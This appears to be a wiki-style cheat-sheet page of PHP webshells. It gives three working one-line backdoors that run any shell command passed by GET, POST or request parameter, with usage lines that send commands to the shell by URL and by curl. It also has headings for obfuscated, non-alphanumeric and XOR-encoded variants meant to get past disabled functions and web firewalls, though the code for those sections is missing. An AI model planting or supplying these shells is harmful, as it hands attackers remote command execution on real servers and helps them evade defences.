Simple PHP Webshell

Several list of simple and obfuscate PHP shell

Simple PHP Webshell

Simple HTTP Requests GET Method Shell

<?=`$_GET[0]`?>

[*] Usage: http://target.com/path/to/shell.php?0=command

Simple HTTP Requests POST Method Shell

<?=`$_POST[0]`?>

[*] Usage: curl -X POST http://target.com/path/to/shell.php -d "0=command"

Support GET and POST Requests Method

<?=`{$_REQUEST['_']}`?>

[*] Usage:
 - http://target.com/path/to/shell.php?_=command
 - curl -X POST http://target.com/path/to/shell.php -d "_=command"

Simple Obfuscated PHP Web Shell

Obfuscated PHP Web shell Example

Non-alphanumeric obfuscation PHP Web Shell

Another Example Obfuscation of Simple PHP Webshell

in case if some functions like system,exec,etc. are disabled we can use var_dump or print_r for print output some function:

Without Space Obfuscation PHP Web Shell

in case if some functions like system,exec,etc. are disabled we can use var_dump or print_r for print output some function:

Without Space and Non-alphanumeric Obfuscation PHP Web Shell

in case if some functions like system,exec,etc. are disabled we can use var_dump or print_r for print output some function:

PHP Uploader

XOR Shell

Encoder PHP webshell to bypass WAF using XOR operations.

PHP Obfuscator

Reference

Last updated

Was this helpful?